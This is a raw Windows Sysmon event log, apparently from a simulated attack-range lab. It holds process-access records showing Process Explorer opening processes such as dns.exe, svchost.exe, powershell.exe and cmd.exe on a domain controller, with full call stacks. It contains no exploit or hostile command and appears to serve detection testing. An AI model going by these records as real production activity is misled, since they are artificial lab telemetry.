15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792367Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792366Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792365Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792364Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792363Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792362Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792361Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792360Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792359Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792358Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792357Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792356Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792355Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792354Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792353Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792352Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792351Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792350Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792349Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792348Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 